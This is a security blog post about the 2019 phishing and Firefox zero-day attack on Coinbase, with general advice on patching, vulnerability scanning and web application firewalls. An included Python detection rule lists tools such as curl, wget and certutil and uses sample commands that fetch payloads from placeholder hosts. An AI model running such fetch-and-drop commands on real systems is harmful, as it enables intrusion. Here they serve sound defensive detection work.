How Did Zero-day Vulnerabilities Help Attack Coinbase? How was it Prevented?
Coinbase — one of the biggest cryptocurrency exchanges in the US — was targeted by attackers during May-June 2019. Fortunately, Coinbase foiled the attack — “a sophisticated, highly targeted, thought out attack,” per Coinbase.
The attack aimed at compromising its systems with the goal of accessing the funds of its users — cryptocurrencies worth billions of dollars. The attack was planned using two zero-day vulnerabilities in Mozilla Firefox (an open-source web browser). However, its team detected and stopped the attack in time.
This brings us to the question: what are zero-day vulnerabilities and how can one defend against them? Let’s find the answers one by one in this post.
What is a Zero-day Vulnerability?
A zero-day (also written 0-day) vulnerability is a software vulnerability that is unknown to, or not yet addressed by, the parties responsible for fixing it. Since the vulnerability is not yet known or mitigated, attackers can leverage this window to exploit it and compromise the software, its data, or the connected machines or networks. Consequently, an attack or exploit that makes use of a zero-day vulnerability is known as a zero-day attack or zero-day exploit.
What’s a software vulnerability? A bug or vulnerability is a flaw in software or an operating system. The root cause of a bug or flaw can be a development error or an improper configuration. In either case, a vulnerability — if unaddressed or unfixed — creates a security hole, which cybercriminals may exploit.
How’s a vulnerability exploited? “Hackers write code to target a specific security weakness. They package it into malware called a zero-day exploit. The malicious software takes advantage of a vulnerability to compromise a computer system or cause an unintended behavior,” according to Norton — a security expert.
An exploit may compromise your system with the goal of controlling it, locking you out of it, spying on your digital activities, stealing or locking your data for ransom, etc. Also, such an exploit may be directly distributed via infected media or websites and mailing lists or combined with other types of attacks to launch a more sophisticated attack — as was the case with the attack on Coinbase.
How was Coinbase Attacked?
The attack used a mix of strategies — spear phishing and social engineering combined with two zero-day vulnerabilities. At the end of May, attackers sent several phishing emails from Gregory Harris, a Research Grants Administrator at the University of Cambridge. These emails contained no attachments or links and passed all security tests. Thus, they seemed legitimate to the recipients.
However, “on June 17 at 6:31am, Gregory Harris sent another email, but this one was different. It contained a URL that, when opened in Firefox, would install malware capable of taking over someone’s machine. Coinbase Security quickly discovered that these emails were anything but ordinary … Within a matter of hours, Coinbase Security detected and blocked the attack,” wrote Coinbase.
How Did Coinbase Defend Itself?
Coinbase expected an attack; it was ready with an attack detection and response strategy. That’s why it was able to foil the attack attempt. “We were able to defend ourselves from this attack due to our security-first culture at Coinbase, complete deployment of our detection and response tooling, clear and well-practiced playbooks, and the ability to rapidly revoke access,” according to Coinbase.
First and foremost, Coinbase gives security training to its employees. The attack was first noticed and reported by one of the employees, and it was also flagged by their attack detection system. Their security team then examined the machine of the employee in question. They found that Mozilla Firefox had shelled out to curl — a popular tool for transferring data over various protocols, including HTTP.
This was suspicious enough for them to recognize that they were looking at an attack. They then determined the scope of the attack and investigated their networks for related suspicious activity. Finally, they contained the attack on the compromised machine by revoking all credentials and locking all accounts of the affected employee.
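The signal Coinbase describes (a browser process shelling out to curl) can be written as a parent-child process rule over endpoint telemetry. The following is an added example, not Coinbase's tooling; the process events, image names and command lines are constructed, and the rule walks the process ancestry so that a child of a browser content process is still attributed to the browser.

```python
from typing import Dict, List, Tuple

# Constructed process-creation events: (pid, ppid, image name, command line).
# These are hypothetical samples, not telemetry from the incident.
SAMPLE_EVENTS: List[Tuple[int, int, str, str]] = [
    (100, 1,   "explorer.exe", "explorer.exe"),
    (200, 100, "firefox",      "/usr/lib/firefox/firefox"),
    (210, 200, "firefox",      "/usr/lib/firefox/firefox -contentproc"),   # content process
    (300, 210, "curl",         "curl -s http://example.invalid/stage2 -o /tmp/s2"),
    (400, 100, "curl",         "curl https://updates.example.invalid/check"),  # benign: spawned by shell
    (500, 200, "sh",           "sh -c 'wget http://example.invalid/x'"),
]

# Browsers normally render content; they have no business launching download tools or shells.
BROWSERS = {"firefox", "firefox.exe", "chrome", "chrome.exe", "msedge.exe"}
SUSPICIOUS_CHILDREN = {"curl", "curl.exe", "wget", "sh", "bash", "cmd.exe",
                       "powershell.exe", "certutil.exe"}


def detect_browser_spawns(events, max_depth: int = 8) -> List[Dict]:
    """Return an alert for every suspicious child whose ancestry contains a browser."""
    by_pid = {pid: (ppid, image, cmd) for pid, ppid, image, cmd in events}
    alerts = []
    for pid, ppid, image, cmd in events:
        if image.lower() not in SUSPICIOUS_CHILDREN:
            continue
        ancestor, depth = ppid, 0
        # Walk upwards: Firefox runs tabs in child processes, so the browser
        # may be the grandparent rather than the direct parent.
        while ancestor in by_pid and depth < max_depth:
            a_ppid, a_image, _ = by_pid[ancestor]
            if a_image.lower() in BROWSERS:
                alerts.append({"pid": pid, "child": image, "cmd": cmd,
                               "browser_pid": ancestor, "browser": a_image})
                break
            ancestor, depth = a_ppid, depth + 1
    return alerts


if __name__ == "__main__":
    for alert in detect_browser_spawns(SAMPLE_EVENTS):
        print(f"ALERT pid={alert['pid']} {alert['browser']}({alert['browser_pid']}) "
              f"-> {alert['child']}: {alert['cmd']}")
```

In a real deployment the same rule would run over EDR or Sysmon process-creation events, with an allow-list for legitimate browser helpers (update checkers, crash reporters) tuned per environment.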
How to Prevent Zero-day Exploits?
There are various types of defense techniques to detect and defend against zero-day exploits. “The research community has broadly classified the defense techniques against zero-day exploits as statistical-based, signature-based, behavior-based, and hybrid techniques (Kaur & Singh, 2014). The primary goal of each of these techniques is to identify the exploit in real time or as close to real time as possible and quarantine the specific attack to eliminate or minimize the damage caused by the attack,” according to a whitepaper by SANS Institute.
You don’t need to implement all these defense techniques yourself, but you should confirm that your security solution does. That said, let’s discuss the essential measures you must undertake in your organization.
1. Update your Systems
Since zero-day exploits are based on new or unpatched vulnerabilities, it’s best to update the software as well as the operating system regularly. Once a patch is available, attackers look for and target machines that have not yet applied it.
This was the case with Heartbleed — a critical bug in OpenSSL, an open-source cryptographic library that implements SSL/TLS (the encryption protocol used to secure the Internet). “Now slightly over two months after Heartbleed, we scanned … found 300k (309,197) still vulnerable,” wrote Errata Security.
2. Scan for Vulnerabilities
It’s not enough to just update systems; you must also run vulnerability scans, since they may identify zero-day vulnerabilities. Such solutions simulate attacks and carry out code reviews on the concerned software (say, after an update) to find new vulnerabilities. If a vulnerability is found, the security team must review the code, test the software, and fix the vulnerable code quickly.
In most cases, organizations are slow to respond to such security reports, and this usually results in a successful attack. Why? Attackers are usually quick to exploit a zero-day vulnerability, as was the case with the attack on Coinbase. It was also the case with Equifax — a credit bureau in the US. The security team at Equifax took two months to patch a bug in Apache Struts, which led to a data breach affecting 147 million customers, including their personal data.
3. Opt for an App Firewall
A Web Application Firewall (WAF) is a specialized firewall that acts as a shield between your software and malicious actors on the web. It monitors the traffic coming to your application in order to detect and block malicious requests.
A WAF protects against the most critical security risks and vulnerabilities including zero-day vulnerabilities. It usually implements some attack detection and attack validation features that help to filter out attacks. Then, it may also integrate with other security solutions to provide an umbrella solution.
That’s all about zero-day vulnerabilities and how you can defend against zero-day exploits.